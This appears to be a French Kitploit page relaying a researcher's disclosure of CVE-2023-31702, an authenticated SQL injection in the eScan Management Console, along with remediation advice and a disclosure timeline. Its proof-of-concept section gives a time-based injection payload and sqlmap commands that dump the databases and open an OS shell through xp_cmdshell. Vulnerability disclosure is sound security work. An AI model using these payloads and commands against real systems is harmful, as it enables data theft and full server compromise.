Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-31702 — CVE-2023-31702 is an authenticated SQL Injection vulnerability discovered in MicroWorld Technologies eScan Management Console version 14.0.1400.2281. | Kitploit
Outils/GitHubGitHub/sahiloj/cve-2023-31702
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationDatabase Security
GitHubsahiloj/cve-2023-31702

CVE-2023-31702

CVE-2023-31702 is an authenticated SQL Injection vulnerability discovered in MicroWorld Technologies eScan Management Console version 14.0.1400.2281.

Voir le dépôt
21il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-31702 — Injection SQL dans la console de gestion eScan (Authentifié)

CVE Severity Type Auth


Présentation

CVE-2023-31702 est une vulnérabilité d'injection SQL authentifiée découverte dans eScan Management Console version 14.0.1400.2281 de MicroWorld Technologies. La vulnérabilité se trouve dans le point d'accès GetUserCurrentPwd, où le paramètre UsrId est passé directement dans une requête SQL sans désinfection ni paramétrage appropriées. Un attaquant authentifié peut exploiter cette faille pour réaliser une injection SQL aveugle basée sur le temps, extraire l'intégralité de la base de données sous-jacente et finalement obtenir un shell de commande OS interactif sur le serveur Microsoft SQL Server sous-jacent — menant à une compromission complète du système.


Détails de la vulnérabilité


Logiciel concerné


Description de la vulnérabilité

La console de gestion eScan fournit une interface web pour gérer la sécurité des terminaux sur le réseau d'une organisation. La fonctionnalité "Afficher le profil utilisateur" expose un point d'accès de type REST :

root@kitploit:~
/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=<ID>&cnt=<compteur>

Le paramètre UsrId est intégré dans une requête SQL back-end sans validation, échappement ni utilisation de requêtes paramétrées. Cela permet à un attaquant authentifié d'injecter des instructions SQL arbitraires dans la requête, entraînant :

  • Injection SQL aveugle basée sur le temps — utilisation de WAITFOR DELAY pour confirmer l'exploitabilité.
  • Exécution de requêtes empilées — permettant des charges utiles multi-instructions.
  • Extraction complète de la base de données — récupération de toutes les tables, utilisateurs, identifiants et données sensibles de la base SQL Server.
  • Exécution de commandes système — exploitation de la procédure stockée xp_cmdshell de SQL Server (activée via sp_configure) pour exécuter des commandes système arbitraires sur le serveur avec les privilèges du compte de service SQL Server.

Impact

Une exploitation réussie de cette vulnérabilité permet à un attaquant de :

  • 🔴 Extraire l'intégralité de la base de données SQL Server, y compris les identifiants des utilisateurs, les données de configuration et les informations sensibles de l'entreprise.
  • 🔴 Obtenir un shell OS interactif sur le serveur Windows hébergeant l'instance SQL Server.
  • 🔴 Exécuter des commandes OS arbitraires (par exemple, créer des comptes de porte dérobée, exfiltrer des données, pivoter vers des ressources réseau internes).
  • 🔴 Compromettre complètement le serveur de gestion eScan et potentiellement tous les terminaux qu'il gère.

⚠️ Note : L'attaquant doit d'abord obtenir des identifiants valides pour la console de gestion eScan. Cependant, une fois authentifié, l'exploitation est simple et ne nécessite pas de privilèges élevés dans la console.


Preuve de concept

Étape 1 — Accéder au point d'accès vulnérable

Après s'être authentifié sur la console de gestion eScan, naviguez vers l'URL suivante :

root@kitploit:~
https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1&cnt=5493

Cela renvoie les données du profil utilisateur courant, confirmant que le point d'accès est accessible.

Point d'accès vulnérable


Étape 2 — Confirmer l'injection SQL avec une charge utile temporelle

Injectez la charge utile de temporisation suivante dans le paramètre UsrId :

root@kitploit:~
https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1;WAITFOR DELAY '0:0:5'--&cnt=4176

Analyse de la charge utile :

  • ; — termine l'instruction SQL d'origine et en commence une nouvelle (requête empilée).
  • WAITFOR DELAY '0:0:5' — demande au serveur SQL de marquer une pause de 5 secondes avant de répondre.
  • -- — commente le reste de la requête d'origine pour éviter les erreurs de syntaxe.

Si la réponse du serveur est retardée d'environ 5 secondes, l'injection est confirmée.

Injection basée sur le temps confirmée


Étape 3 — Extraire les bases de données avec SQLMap

Une fois l'injection SQL aveugle confirmée, la base de données complète peut être extraite à l'aide de SQLMap :

root@kitploit:~
sqlmap -u "https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1&cnt=5493" \
  --cookie="<session_cookie>" \
  --dbms=mssql \
  --dbs \
  --batch

Cela énumère toutes les bases de données hébergées sur le serveur SQL back-end.


Étape 4 — Obtenir un shell OS via SQLMap

SQLMap peut également escalader l'attaque vers une exécution de commandes au niveau OS en activant et en exploitant xp_cmdshell :

root@kitploit:~
sqlmap -u "https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1&cnt=5493" \
  --cookie="<session_cookie>" \
  --dbms=mssql \
  --os-shell \
  --batch

Cela établit un shell OS interactif sur l'hôte SQL Server.

Obtention d'un shell OS via SQLMap


Étape 5 — Exécuter des commandes OS sur le serveur

Une fois le shell OS établi, des commandes Windows arbitraires peuvent être exécutées sur le serveur :

Exécution de commandes OS


Correctifs

Les mesures suivantes sont fortement recommandées pour corriger et atténuer cette vulnérabilité :

  1. Utiliser des requêtes paramétrées / des instructions préparées — Ne jamais concaténer directement des entrées utilisateur dans des requêtes SQL. Utiliser des paramètres liés pour séparer les données de la logique de requête.

  2. Validation et désinfection des entrées — Valider strictement tous les paramètres fournis par l'utilisateur côté serveur. Pour les identifiants numériques comme UsrId, imposer une entrée de type entier uniquement et rejeter toute valeur contenant des caractères spéciaux.

  3. Appliquer le correctif de l'éditeur — Mettre à jour la console de gestion eScan vers la dernière version disponible. Contacter le support de MicroWorld Technologies ou consulter leurs bulletins de sécurité pour la dernière version corrigée.

  4. Principe de moindre privilège pour les comptes de base de données — Le compte de base de données de l'application doit disposer des seules permissions minimales nécessaires. Il ne doit pas avoir les rôles sysadmin ou db_owner, et xp_cmdshell doit être désactivé.

  5. Désactiver xp_cmdshell — Sauf si explicitement nécessaire, désactiver la procédure stockée étendue xp_cmdshell sur l'instance SQL Server :

    root@kitploit:~
    EXEC sp_configure 'xp_cmdshell', 0;
    RECONFIGURE;
    
  6. Pare-feu applicatif (WAF) — Déployer un WAF pour détecter et bloquer les schémas d'injection SQL courants en tant que mesure de défense en profondeur.


Calendrier de divulgation

DateÉvénement
16 mai 2023Vulnérabilité découverte et signalée par Sahil Ojha
Mai 2023CVE-2023-31702 attribué par MITRE
Mai 2023Divulgation publique

Références

  • NVD — CVE-2023-31702 (vérifier le statut de publication actuel sur NVD)
  • MITRE — CVE-2023-31702 (vérifier le statut de publication actuel sur MITRE)
  • eScan de MicroWorld Technologies
  • SQLMap — Outil automatique d'injection SQL
  • OWASP — Injection SQL
  • CWE-89 — Neutralisation incorrecte des éléments spéciaux utilisés dans une commande SQL

Auteur

Sahil Ojha — Chercheur en sécurité

Cette divulgation est destinée uniquement à des fins éducatives et de recherche en sécurité. L'exploitation de cette vulnérabilité sur des systèmes sans autorisation écrite explicite est illégale et contraire à l'éthique.

Télécharger l’outil
ChampDétails
Identifiant CVECVE-2023-31702
Type de vulnérabilitéInjection SQL (aveugle basée sur le temps / requêtes empilées)
Produit affectéConsole de gestion eScan de MicroWorld Technologies
Version affectée14.0.1400.2281
Point d'accès vulnérable/ewconsole/ewconsole.dll/GetUserCurrentPwd
Paramètre vulnérableUsrId
AuthentificationRequise (identifiants valides de la console)
Testé surWindows
Score CVSS v3.18.8 (Élevé)
Vecteur CVSSAV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Date de signalement16 mai 2023
AuteurSahil Ojha
ChampDétails
ÉditeurMicroWorld Technologies
ProduitConsole de gestion eScan
Page d'accueil de l'éditeurhttps://www.escanav.com
Lien du logicielhttps://cl.escanav.com/ewconsole.dll
PlateformeWindows
  • Segmentation réseau — Restreindre l'accès à la console de gestion eScan aux plages IP de confiance et s'assurer que le serveur SQL n'est pas directement exposé sur Internet.